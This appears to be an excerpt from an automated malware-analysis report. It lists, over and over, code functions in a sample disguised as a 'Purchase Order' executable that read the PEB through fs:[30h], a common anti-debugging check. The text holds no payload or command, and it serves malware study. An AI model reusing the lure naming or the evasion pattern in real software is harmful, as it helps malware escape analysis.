Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F82D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0105070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01007794 mov eax, dword ptr fs:[00000030h]
